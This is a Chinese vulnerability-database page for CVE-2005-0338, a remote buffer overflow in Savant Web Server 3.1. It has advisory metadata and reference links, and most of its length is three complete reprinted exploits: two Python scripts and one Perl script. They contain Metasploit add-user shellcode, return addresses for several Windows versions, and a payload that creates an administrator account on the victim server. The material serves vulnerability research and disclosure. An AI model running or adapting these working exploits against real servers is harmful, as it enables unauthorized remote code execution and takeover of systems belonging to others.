CVE-2005-0338
CVSS7.5
发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:10:45
NMCOES    

[原文]Buffer overflow in Savant Web Server 3.1 allows remote attackers to execute arbitrary code via a long HTTP request.


[CNNVD]Savant Web Server 缓冲区溢出漏洞(CNNVD-200505-417)

        Savant Web Server 3.1存在缓冲区溢出漏洞,远程攻击者可以通过长的HTTP请求来执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0338
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0338
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-417
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110756234611259&w=2
(UNKNOWN)  BUGTRAQ  20050204 Exploit For Savant Web Server 3.1 (tested on win2003)
http://marc.info/?l=full-disclosure&m=110725682327452&w=2
(UNKNOWN)  FULLDISC  20050201 Remotely exploitable buffer overflow vulnerability in Savant Web Server 3.1
http://marc.info/?l=full-disclosure&m=110728448025559&w=2
(UNKNOWN)  FULLDISC  20050201 Remotely exploitable buffer overflow vulnerability in Savant Web Server 3.1
http://www.securityfocus.com/bid/12429
(UNKNOWN)  BID  12429
http://xforce.iss.net/xforce/xfdb/19177
(UNKNOWN)  XF  savant-bo(19177)

- 漏洞信息

Savant Web Server 缓冲区溢出漏洞
高危 缓冲区溢出
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        Savant Web Server 3.1存在缓冲区溢出漏洞,远程攻击者可以通过长的HTTP请求来执行任意代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (781)

Savant Web Server 3.1 Remote Buffer Overflow Exploit (EDBID:781)
windows remote
2005-02-01 Verified
80 Tal Zeltzer
[点击下载] [点击下载]
#########################################################
#                                                       #
# Savant web server Buffer Overflow Exploit             #
# Discovered by : Mati Aharoni                          #
# Coded by : Tal Zeltzer and Mati Aharoni               #
# www.see-security.com                                  #
# FOR RESEACRH PURPOSES ONLY!                           #
#########################################################
import struct
import socket
sc = "\x90" * 21
# win32_adduser - PASS=pwd EXITFUNC=thread USER=X Size=232 Encoder=PexFnstenvSub http://metasploit.com
sc += "\x31\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
sc += "\x23\x73\xe4\x83\xeb\xfc\xe2\xf4\x24\xcb\x35\xe4\xd8\x23\xf8\xa1"
sc += "\xe4\xa8\x0f\xe1\xa0\x22\x9c\x6f\x97\x3b\xf8\xbb\xf8\x22\x98\x07"
sc += "\xf6\x6a\xf8\xd0\x53\x22\x9d\xd5\x18\xba\xdf\x60\x18\x57\x74\x25"
sc += "\x12\x2e\x72\x26\x33\xd7\x48\xb0\xfc\x27\x06\x07\x53\x7c\x57\xe5"
sc += "\x33\x45\xf8\xe8\x93\xa8\x2c\xf8\xd9\xc8\xf8\xf8\x53\x22\x98\x6d"
sc += "\x84\x07\x77\x27\xe9\xe3\x17\x6f\x98\x13\xf6\x24\xa0\x2c\xf8\xa4"
sc += "\xd4\xa8\x03\xf8\x75\xa8\x1b\xec\x31\x28\x73\xe4\xd8\xa8\x33\xd0"
sc += "\xdd\x5f\x73\xe4\xd8\xa8\x1b\xd8\x87\x12\x85\x84\x8e\xc8\x7e\x8c"
sc += "\x37\xed\x93\x84\xb0\xbb\x8d\x6e\xd6\x74\x8c\x03\x30\xcd\x8c\x1b"
sc += "\x27\x40\x1e\x80\xf6\x46\x0b\x81\xf8\x0c\x10\xc4\xb6\x46\x07\xc4"
sc += "\xad\x50\x16\x96\xf8\x7b\x53\x94\xaf\x47\x53\xcb\x99\x67\x37\xc4"
sc += "\xfe\x05\x53\x8a\xbd\x57\x53\x88\xb7\x40\x12\x88\xbf\x51\x1c\x91"
sc += "\xa8\x03\x32\x80\xb5\x4a\x1d\x8d\xab\x57\x01\x85\xac\x4c\x01\x97"
sc += "\xf8\x7b\x53\xcb\x99\x67\x37\xe4";
sc += "AA"
# Win2k SP0,1,2,3,4
#Change Return address as needed
buf = "\xEB\x19" + " /" + sc + struct.pack("<L",0x750236b2) + "\r\n\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('127.0.0.1',80))
s.send(buf)
s.close()

# milw0rm.com [2005-02-01]
		

- 漏洞信息 (787)

Savant Web Server 3.1 Remote Buffer OverflowExploit (win2003) (EDBID:787)
windows remote
2005-02-04 Verified
80 CorryL
[点击下载] [点击下载]
#!/usr/bin/perl
#
#D:\Documents and Settings\Administrator\Desktop\explo da uppare\prova>savant.pl
#-h 127.0.0.1
#
#-=[     Savant Web Server 3.1 Remote Buffer Overflow Exploit            ]=-
#-=[                                                                     ]=-
#-=[ Coded by CorryL                            info:www.x0n3-h4ck.org   ]=-
#
#[+] Connect to 127.0.0.1
#[+] Using 00b7ead8 // Ret For Win2003
#[+] Sending Payload 258 byte
#[+] Creating Administrator User: User 'bug' Password 'hack'
#
#D:\Documents and Settings\Administrator\Desktop\explo da uppare\prova>net users
#
#Account utente per \\SERVER
# Added above info from http://x0n3-h4ck.org /str0ke                             #
##################################################################################
#Savant Web Server 3.1 Remote Buffer Overflow Exploit                            #        
#                                                                                #
#This is exploit sending the 253 evil byte                                       #   
#the eip register the overwrite on 254 > 258 byte                                #
#exploit succefull created the Administrator User                                #
#in the server victim                                                            #
#Tested on win2003 server using ret 00b7ead8                                     #
#										 #
#D:\Documents and Settings\Administrator\Desktop\explo da uppare\prova>net users #
#Account utente per \\SERVER                                                     #
#------------------------------------------------------------------------------- #
#__vmware_user__          Administrator            ASPNET                        #
#bug                      Guest                    SUPPORT_388945a0              #
#Esecuzione comando riuscita.                                                    # 
#D:\Documents and Settings\Administrator\Desktop\explo da uppare\prova>          #
# 										 #
#thanks to Mati Aharoni for discovered the bug     			         #  
#  	                                                  info: www.x0n3-h4ck.org#
##################################################################################

use IO::Socket; 
use Getopt::Std; getopts('h:', \%args);


if (defined($args{'h'})) { $host = $args{'h'}; }

print STDERR "\n-=[     Savant Web Server 3.1 Remote Buffer Overflow Exploit            ]=-\n";
print STDERR "-=[                                                                     ]=-\n";
print STDERR "-=[ Coded by CorryL                            info:www.x0n3-h4ck.org   ]=-\n\n";

if (!defined($host)) {
Usage();
}

$nop = "\x90"x13;
$ret= "\xd8\xea\xb7\x00";
my $shellcode =
"\x2b\xc9\x83\xe9\xca\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x09".
"\xb1\xc5\xbd\x83\xeb\xfc\xe2\xf4\xf5\x59\x83\xbd\x09\xb1\x4e\xf8".
"\x35\x3a\xb9\xb8\x71\xb0\x2a\x36\x46\xa9\x4e\xe2\x29\xb0\x2e\x5e".
"\x27\xf8\x4e\x89\x82\xb0\x2b\x8c\xc9\x28\x69\x39\xc9\xc5\xc2\x7c".
"\xc3\xbc\xc4\x7f\xe2\x45\xfe\xe9\x2d\xb5\xb0\x5e\x82\xee\xe1\xbc".
"\xe2\xd7\x4e\xb1\x42\x3a\x9a\xa1\x08\x5a\x4e\xa1\x82\xb0\x2e\x34".
"\x55\x95\xc1\x7e\x38\x71\xa1\x36\x49\x81\x40\x7d\x71\xbe\x4e\xfd".
"\x05\x3a\xb5\xa1\xa4\x3a\xad\xb5\xe0\xba\xc5\xbd\x09\x3a\x85\x89".
"\x0c\xcd\xc5\xbd\x09\x3a\xad\x81\x56\x80\x33\xdd\x5f\x5a\xc8\xd5".
"\xf9\x3b\xc1\xe2\x61\x29\x3b\x37\x07\xe6\x3a\x5a\xe1\x5f\x3a\x42".
"\xf6\xd2\xa8\xd9\x27\xd4\xbd\xd8\x29\x9e\xa6\x9d\x67\xd4\xb1\x9d".
"\x7c\xc2\xa0\xcf\x29\xd3\xb0\xda\x29\xd9\xa4\xde\x62\x91\xea\xfc".
"\x4d\xf5\xe5\x9b\x2f\x91\xab\xd8\x7d\x91\xa9\xd2\x6a\xd0\xa9\xda".
"\x7b\xde\xb0\xcd\x29\xf0\xa1\xd0\x60\xdf\xac\xce\x7d\xc3\xa4\xc9".
"\x66\xc3\xb6\x9d\x6b\xc4\xa2\x9d\x26\xf0\x81\xf9\x09\xb1\xc5\xbd";

print "[+] Connect to $host\n";

$socket = new IO::Socket::INET (PeerAddr => "$host",
                                PeerPort => 80,
                                Proto => 'tcp');
                                die unless $socket;
                                print "[+] Using 00b7ead8 // Ret For Win2003\n"; 
                                $buff = $nop.$shellcode.$ret;
                                print "[+] Sending Payload 258 byte\n";
                                $data = "GET /$buff \r\n\r\n";
         
                                send ($socket,$data,0);
print "[+] Creating Administrator User: User 'bug' Password 'hack'\n";
close;

sub Usage {
print STDERR "Usage:
-h Victim host.\n\n";
exit;
}

# milw0rm.com [2005-02-04]
		

- 漏洞信息 (819)

Savant Web Server 3.1 Remote BoF (French Win OS support) (EDBID:819)
windows remote
2005-02-15 Verified
80 Jerome Athias
[点击下载] [点击下载]
#########################################################
#                                                       #
# Savant web server Buffer Overflow Exploit             #
# Discovered by : Mati Aharoni                          #
# Coded by : Tal Zeltzer and Mati Aharoni               #
# www.see-security.com                                  #
# FOR RESEACRH PURPOSES ONLY!                           #
# FRench Win OS support by Jerome Athias                #
#########################################################
import struct
import socket
sc = "\x90" * 21	#We need this number of nops
# win32_adduser - PASS=pwd EXITFUNC=thread USER=X Size=232 Encoder=PexFnstenvSub http://metasploit.com
sc += "\x31\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
sc += "\x23\x73\xe4\x83\xeb\xfc\xe2\xf4\x24\xcb\x35\xe4\xd8\x23\xf8\xa1"
sc += "\xe4\xa8\x0f\xe1\xa0\x22\x9c\x6f\x97\x3b\xf8\xbb\xf8\x22\x98\x07"
sc += "\xf6\x6a\xf8\xd0\x53\x22\x9d\xd5\x18\xba\xdf\x60\x18\x57\x74\x25"
sc += "\x12\x2e\x72\x26\x33\xd7\x48\xb0\xfc\x27\x06\x07\x53\x7c\x57\xe5"
sc += "\x33\x45\xf8\xe8\x93\xa8\x2c\xf8\xd9\xc8\xf8\xf8\x53\x22\x98\x6d"
sc += "\x84\x07\x77\x27\xe9\xe3\x17\x6f\x98\x13\xf6\x24\xa0\x2c\xf8\xa4"
sc += "\xd4\xa8\x03\xf8\x75\xa8\x1b\xec\x31\x28\x73\xe4\xd8\xa8\x33\xd0"
sc += "\xdd\x5f\x73\xe4\xd8\xa8\x1b\xd8\x87\x12\x85\x84\x8e\xc8\x7e\x8c"
sc += "\x37\xed\x93\x84\xb0\xbb\x8d\x6e\xd6\x74\x8c\x03\x30\xcd\x8c\x1b"
sc += "\x27\x40\x1e\x80\xf6\x46\x0b\x81\xf8\x0c\x10\xc4\xb6\x46\x07\xc4"
sc += "\xad\x50\x16\x96\xf8\x7b\x53\x94\xaf\x47\x53\xcb\x99\x67\x37\xc4"
sc += "\xfe\x05\x53\x8a\xbd\x57\x53\x88\xb7\x40\x12\x88\xbf\x51\x1c\x91"
sc += "\xa8\x03\x32\x80\xb5\x4a\x1d\x8d\xab\x57\x01\x85\xac\x4c\x01\x97"
sc += "\xf8\x7b\x53\xcb\x99\x67\x37\xe4";
sc += "AA"
# Win2k SP0,1,2,3,4 (US...)
#Change Return address as needed
#buf = "\xEB\x19" + " /" + sc + struct.pack("<L",0x750236b2) + "\r\n\r\n"

#0x74FA2AC4		pop esi - pop - ret	ws2help.dll	Win 2K SP4 FR (Found with findjmp2 by Class101 ;)
#buf = "\x90" * 24 + " /" + sc + struct.pack("<L",0x74fa2ac5) + "\r\n\r\n"	#EB becomes CB...? so i changed it by nops

#Win XP SP2 FR?
#0x719E260D		pop esi - pop - ret	ws2help.dll	Win XP SP2 FR (Found with findjmp2 by Class101 ;)
#buf = "\x90" * 24 + " /" + sc + struct.pack("<L",0x719e260e) + "\r\n\r\n"	#EB becomes CB...? so i changed it by nops


s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('127.0.0.1',80))
s.send(buf)
s.close()

# milw0rm.com [2005-02-15]
		

- 漏洞信息

13532
Savant Web Server HTTP Version Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public, Exploit Commercial

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-02-01 Unknow
2005-02-04 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Savant Web Server Remote Buffer Overflow Vulnerability
Boundary Condition Error 12429
Yes No
2005-02-02 12:00:00 2009-12-17 06:53:00
Mati Aharoni is credited with the discovery of this issue.

- 受影响的程序版本

Savant Savant Webserver 3.1

- 漏洞讨论

A remote buffer-overflow vulnerability affects Savant Web Server. This issue occurs because the application fails to validate the length of user-supplied strings before copying them into finite process buffers.

A remote attacker may leverage this issue to execute arbitrary code with the privileges of the affected webserver. This issue may facilitate unauthorized access or privilege escalation.

- 漏洞利用

The following exploits are available:

- 解决方案

Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站